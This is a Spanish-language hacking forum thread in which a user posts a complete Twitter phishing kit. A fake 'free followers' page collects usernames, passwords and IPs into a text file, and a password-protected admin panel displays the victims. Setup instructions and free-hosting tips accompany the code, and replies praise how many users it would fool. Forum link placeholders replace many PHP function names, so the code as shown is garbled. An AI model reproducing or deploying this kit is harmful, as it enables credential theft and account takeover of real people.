[Phishing] Página de phishing para Twitter

  • 8 Respuestas
  • 8324 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado bernatixer

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • Not yet
  • Skype: bernat.torres.bellido
  • Twitter: BernatTorres
    • Ver Perfil
    • bernatixer

[Phishing] Página de phishing para Twitter

  • en: Enero 01, 2016, 11:57:36 am

Buenas soy bernatixer, hasta el día de hoy underc0de y sus usuarios me han proporcionado mucha información y herramientas, así que hoy decido aportar mi granito de arena a la comunidad.

Se trata de una página de phishing para twitter. La web pretende añadir seguidores (bots) a tu cuenta de twitter, y como todos sabemos cuando alguien con pocos conocimientos busca algo gratis (que normalmente es de pago) se descarga todo e introduce sus datos donde sea por tal de lograrlo. Así que en este caso nos vamos a aprovechar de esto.

Funcionamiento:
El usuario (víctima) entra en la web, introduce sus datos (usuario y contraseña :D) el número de seguidores que quiere (para hacerlo más real a partir de 1000 seguidores tendrá que pagar...) le da a un botón y que mala suerte! Ha ocurrido un error al añadir los seguidores a su cuenta.
Estos datos se guardaran en un archivo TXT, así que en ningún momento se va a necesitar MySQL, SQLite, o cualquier otro.
Y para terminar, hay un panel de admin de todas las víctimas, su usuario, contraseña y IP, todo automatico. (La contraseña default del panel de admin es 'b3rn4t1x3r').

Información técnica:
La web esta programada con Bootstrap para hacerla responsive, limpia etc... No se necesita descargar ningún archivo CSS ni JS, están todos alojados en un CDN y minificados, así que se aumenta el tiempo de respuesta. En resumen, todo esto es para que la víctima vea que la web esta algo trabajada y confíe mas en nosotros.

Si quieres provar la web, la he subido a mi servidor (Las IPs no se muestran en esta versión)
[Porvafor si quereis hacer phishing no paseis este link, seguid el tutorial de abajo]
Phishing: You are not allowed to view links. Register or Login
Citar
Panel: You are not allowed to view links. Register or Login
Citar

Tutorial:
La web es muy fácil de editar, pero si no dominais mucho aquí van unas pequeñas explicaciones.
Teniendo en cuenta que el HTML es senzillo de entender voy a pasar directamente al PHP y si teneis alguna duda simplemente comentadla.
Lo que hace falta saber de PHP en el archivo 'index.php' es que si quereis cambiar el archivo de logs (Por defecto: datos.txt) teneis que canviar la variable [$fichero = "datos.txt";]
Del archivo 'admin.php' solo hace falta saber cambiar la pass, está en la línea 35. Nada mas, es algo senzillo en los dos casos.

No teneis servidor para hacer pruebas o subir la web? Os dejo una lista de hostings gratis:
 - You are not allowed to view links. Register or Login
 - You are not allowed to view links. Register or Login

IMPORTANTE: Recordad crear el archivo 'datos.txt', ya que sino no funcionara correctamente.
index.php
Código: PHP
  1. <!DOCTYPE html>
  2. <html lang="en">
  3.   <head>
  4.     <meta charset="utf-8">
  5.     <meta http-equiv="X-UA-Compatible" content="IE=edge">
  6.     <meta name="viewport" content="width=device-width, initial-scale=1">
  7.     <title>Twitter - Bots</title>
  8.     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
  9.     <style>
  10.     body {
  11.       height:100%;
  12.       width:100%;
  13.       background-image: url("http://www.imperial.ac.uk/imedia/general_graphics/interact/images/twitterBG.jpg");
  14.       background-repeat: no-repeat;
  15.       background-size:cover;
  16.     }
  17.     .centrar {
  18.       min-height: 100vh;
  19.       display: flex;
  20.       align-items: center;
  21.     }
  22.     </style>
  23.   </head>
  24.   <body>
  25.   <?php
  26.   if (You are not allowed to view links. Register or Login($_POST["usuario"]) && You are not allowed to view links. Register or Login($_POST["pass"])) {
  27.     $fichero = "datos.txt";
  28.     $usuario = You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login("<:>","",$_POST["usuario"]));
  29.     $pass = You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login("<:>","",$_POST["pass"]));
  30.     $ip = $_SERVER['REMOTE_ADDR'];
  31.     $text = $usuario."<:>".$pass."<:>".$ip;
  32.     $nuevo = You are not allowed to view links. Register or Login($fichero);
  33.     $nuevo .= $text."\n";
  34.     You are not allowed to view links. Register or Login($fichero, $nuevo);
  35.     $m = "<div class='alert alert-danger' role='alert'>Error 225; No se han podido añadir los seguidores en tu cuenta.</div>";
  36.   }else{
  37.     $m = "";
  38.   }
  39.   ?>
  40.   <div class="container centrar">
  41.     <div class="row">
  42.       <div class="col-md-12">
  43.         <div class="alert alert-info">
  44.           <h1><b>SEGUIDORES EN TWITTER GRATIS</b></h1><hr/>
  45.           <form method="POST" action="#">
  46.             <?php echo $m; ?>
  47.             <input name="usuario" type="text" class="form-control" placeholder="Nombre de usuario"><br/>
  48.             <input name="pass" type="password" class="form-control" placeholder="Contraseña"><br/>
  49.             <select class="form-control">
  50.               <option>10 seguidores (GRATIS)</option>
  51.               <option>50 seguidores (GRATIS)</option>
  52.               <option>100 seguidores (GRATIS)</option>
  53.               <option>1000 seguidores (GRATIS)</option>
  54.               <option>5000 seguidores (10€)</option>
  55.               <option>10000 seguidores (50€)</option>
  56.             </select><br/>
  57.             <button class="btn btn-success btn-lg btn-block" type="submit">Añadir seguidores</button>
  58.           </form>
  59.         </div>
  60.       </div>
  61.     </div>
  62.   </div>
  63.   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  64.   <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
  65.   </body>
  66. </html>
  67.  

admin.php
Código: PHP
  1. <!DOCTYPE html>
  2. <html lang="en">
  3.   <head>
  4.     <meta charset="utf-8">
  5.     <meta http-equiv="X-UA-Compatible" content="IE=edge">
  6.     <meta name="viewport" content="width=device-width, initial-scale=1">
  7.     <title>Twitter - Bots</title>
  8.     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
  9.     <style>
  10.     body {
  11.       height:100%;
  12.       width:100%;
  13.       background-image: url("https://mal.sec.gd/images/bgSlider/img01.png");
  14.       background-repeat: no-repeat;
  15.       background-size:cover;
  16.     }
  17.     .espacio {
  18.       margin-top: 5vh;
  19.     }
  20.     </style>
  21.   </head>
  22.   <body>
  23.   <div class="container espacio">
  24.   <div class="alert alert-danger">
  25.     <?php
  26. if (!You are not allowed to view links. Register or Login($_POST["pass"])) {
  27.     ?>
  28.     <form method="POST" action="#">
  29.       <input name="pass" type="password" class="form-control" placeholder="Contraseña"><br/>
  30.       <button class="btn btn-danger btn-lg btn-block" type="submit">Entrar</button>
  31.     </form>
  32.     <?php
  33.     You are not allowed to view links. Register or Login;
  34. } else {
  35. if ($_POST["pass"] != "b3rn4t1x3r") {
  36.   ?>
  37.   <div class='alert alert-warning' role='alert'>Contraseña incorrecta</div>
  38.   <form method="POST" action="#">
  39.     <input name="pass" type="password" class="form-control" placeholder="Contraseña"><br/>
  40.     <button class="btn btn-danger btn-lg btn-block" type="submit">Entrar</button>
  41.   </form>
  42.   <?php
  43. } else {
  44. ?>
  45.     <div class="text-right"><a class="btn btn-danger" href="">Salir</a></div>
  46.     <h2>Datos de los usuarios</h2><hr/>
  47.     <table class="table table-striped">
  48.       <thead>
  49.         <tr>
  50.           <th>Usuario</th>
  51.           <th>Contraseña</th>
  52.           <th>IP</th>
  53.         </tr>
  54.       </thead>
  55.       <tbody>
  56.         <?php
  57.         $fichero = You are not allowed to view links. Register or Login('datos.txt','r');
  58.         while ($linea = You are not allowed to view links. Register or Login($fichero)) {
  59.           $array = You are not allowed to view links. Register or Login('<:>', You are not allowed to view links. Register or Login($linea));
  60.           echo "<tr>";
  61.           echo "<th><font color='green'>". $array[0] ."</font></th>";
  62.           echo "<th><font color='green'>". $array[1] ."</font></th>";
  63.           echo "<th><font color='green'>". $array[2] ."</font></th>";
  64.           echo "</tr>";
  65.         }
  66.         You are not allowed to view links. Register or Login($fichero);
  67.         ?>
  68.       </tbody>
  69.     </table>
  70.   </div>
  71.   <?php
  72. }
  73. }
  74.   ?>
  75.   </div>
  76.   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  77.   <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
  78.   </body>
  79. </html>
  80.  
« Última modificación: Enero 02, 2016, 09:20:58 am por Bernatixer »
You are not allowed to view links. Register or Login

Desconectado rollth

  • *
  • Ex-Staff
  • *****
  • Mensajes: 876
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
  • Twitter: @RoloMijan
    • Ver Perfil
    • Whateversec
    • Email

Re:[Phishing] Página de phishing para Twitter

  • en: Enero 01, 2016, 10:32:36 pm
Muy bueno!

Ya te lo he dicho por skype, pero recalco por aqui tambien. Ese código tiene XSS :D
Si puedes arreglarlo sería genial.

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5677
  • Actividad:
    30%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email

Re:[Phishing] Página de phishing para Twitter

  • en: Enero 01, 2016, 10:44:48 pm
Muy bueno bro!
Respecto a lo que dice @You are not allowed to view links. Register or Login, te dejo un link de un taller de XSS que hicimos: You are not allowed to view links. Register or Login
Ahi aparecen dos formas de fixear el XSS

Saludos!
ANTRAX


Desconectado bernatixer

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • Not yet
  • Skype: bernat.torres.bellido
  • Twitter: BernatTorres
    • Ver Perfil
    • bernatixer

Re:[Phishing] Página de phishing para Twitter

  • en: Enero 02, 2016, 09:22:57 am
Gracias por avisar de la vulnerabilidad, ya esta solucionado  ;)
You are not allowed to view links. Register or Login

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5677
  • Actividad:
    30%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email

Re:[Phishing] Página de phishing para Twitter

  • en: Enero 02, 2016, 12:09:41 pm
You are not allowed to view links. Register or Login
Gracias por avisar de la vulnerabilidad, ya esta solucionado  ;)

Gran trabajo bro! Muy buen aporte!
Te dejare +c0in


Desconectado Stiuvert

  • *
  • Ex-Staff
  • *****
  • Mensajes: 2681
  • Actividad:
    0%
  • Reputación 15
  • Skype: [email protected]
  • Twitter: @Stiuvert
    • Ver Perfil

Re:[Phishing] Página de phishing para Twitter

  • en: Enero 02, 2016, 01:48:24 pm
Excelente fake, realmente sencillo y eficaz, seguro que más de uno picaría  ::)  ;D
Y gran trabajo corrigiendo ese XSS!!

Saludos

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1949
  • Actividad:
    0%
  • Country: es
  • Reputación 16
    • Ver Perfil

Re:[Phishing] Página de phishing para Twitter

  • en: Enero 02, 2016, 02:15:46 pm
Fuck, probé el xss antes de leer los comentarios y obviamente no saltó jajajaja.

Buen trabajo @You are not allowed to view links. Register or Login, estoy seguro que caerían muchos usuarios con este tipo de métodos.

Saludos.


Desconectado ignorante

  • *
  • Underc0der
  • Mensajes: 19
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:[Phishing] Página de phishing para Twitter

  • en: Enero 07, 2016, 09:49:27 am
Buenas, tal vez sobre este comentario,si es asi disculpen,  pero conocen setoolkit ?
You are not allowed to view links. Register or Login

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5677
  • Actividad:
    30%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email

Re:[Phishing] Página de phishing para Twitter

  • en: Enero 07, 2016, 10:23:35 am
You are not allowed to view links. Register or Login
Buenas, tal vez sobre este comentario,si es asi disculpen,  pero conocen setoolkit ?
You are not allowed to view links. Register or Login

Si es cierto, se podría usar SET. Hace un tiempo dejé un paper en el foro sobre eso

You are not allowed to view links. Register or Login

Saludos!
ANTRAX


 

Eternal - Un escáner para Eternal Blue

Iniciado por puntoCL

Respuestas: 2
Vistas: 4382
Último mensaje Julio 23, 2017, 10:37:05 pm
por puntoCL
Paso a paso para ser un verdadero < HACKER > lo mejor que hay

Iniciado por smown

Respuestas: 5
Vistas: 6300
Último mensaje Agosto 17, 2018, 09:20:02 am
por ANTRAX
Sniffer para windows "RawCap"

Iniciado por s747ik

Respuestas: 1
Vistas: 4290
Último mensaje Junio 12, 2011, 04:08:03 pm
por staRgan
Conocimientos importantes para "empezar" en la seguridad informática.

Iniciado por Bael

Respuestas: 46
Vistas: 57857
Último mensaje Julio 31, 2020, 11:45:46 pm
por mioldi
¿Cual Backtrack, Kali, Bugtraq,Backbox o BlackArch y otras hierbas para aprender

Iniciado por Snifer

Respuestas: 0
Vistas: 3617
Último mensaje Marzo 15, 2014, 11:07:50 am
por Snifer